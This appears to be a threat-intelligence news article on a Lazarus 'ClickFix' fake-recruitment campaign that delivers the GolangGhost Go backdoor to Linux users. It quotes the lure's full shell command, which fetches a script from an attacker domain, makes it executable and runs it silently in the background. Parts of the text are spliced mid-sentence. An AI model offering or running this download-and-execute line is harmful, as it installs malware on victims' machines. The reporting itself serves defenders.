A newly observed social engineering wave tied to the Lazarus constellation is exploiting the seasonal rush for remote cryptocurrency jobs.
Dubbed “ClickFix”, the lure refines the earlier ClickFake Interview playbook by introducing a new repair-tool twist that incorporates a bespoke Go backdoor, which the Sekoia TDR team calls GolangGhost.
The result is a streamlined infection chain that blends convincing human-resources pretexting with a one-command shell payload, lowering barriers for non-technical marks and widening Lazarus’ reach into cryptocurrency-centric firms.
The campaign still begins with LinkedIn messages or recruitment-themed emails that invite candidates to a “recorded video introduction” portal hosted on a look-alike domain (e.g., waventic.com).
Once the visitor grants minimal browser permissions, a pop-up appears, claiming “Access to your camera or microphone is currently blocked” and blaming a “race condition in the Linux camera driver cache.” The screen then walks the user through three steps:
curl,bashcurl -k -o /var/tmp/mediadriver.sh https://support.waventic.com/mediadrivers-linux.sh && \
chmod +x /var/tmp/mediadriver.sh && \
nohup bash /var/tmp/mediadriver.sh >/dev/null 2>&1 &
This single command silently downloads the ClickFix helper script. Compared to Lazarus’ 2023 ContagiousInterview builds, which relied on macro-enabled DOCX or ISO images, the shell-script delivery removes file-opening friction, evades many attachment filters, and inherits the trust users place in legitimate troubleshooting snippets.
mediadriver.sh ultimately drops an ELF executable compiled with Go 1.22, internally branded “ghost”. Technical analysis of recent hashes shows:
video-helper.service, auto-starting with the multi-user.target.GolangGhost’s Go runtime, static linking, and stripped symbols inflate the binary size (~7 MB), but also enable the malware to run unmodified across most 64-bit Linux distributions, a crucial trait for targeting developer workstations in blockchain firms.
curl/wget from browsers or unknown terminals and monitor long-lived bash children of browser processes./tmp or /var/tmp.The ClickFix variant demonstrates Lazarus’ rapid iteration: shaving steps off the social-engineering funnel while adopting Go tooling that complicates static analysis.
With the crypto sector entering another volatile summer, organizations should strengthen endpoint egress controls and enhance user education to prevent the heat from escalating into a breach.
PortSwigger has leveled up Burp Suite's scanning arsenal with the latest Active Scan++ extension, version…
Unit 42 researchers at Palo Alto Networks exposed serious flaws in the Model Context Protocol…
Polish police have arrested three Ukrainian men traveling through Europe and seized a cache of…
Google has launched its most significant Chrome update ever, embedding Gemini AI across the browser…
Attackers exploit this vulnerability through the router's web interface components, specifically "cgibin" and "hnap_main," by…
Security researchers have uncovered a severe flaw in Apache Tika, a popular open-source toolkit for…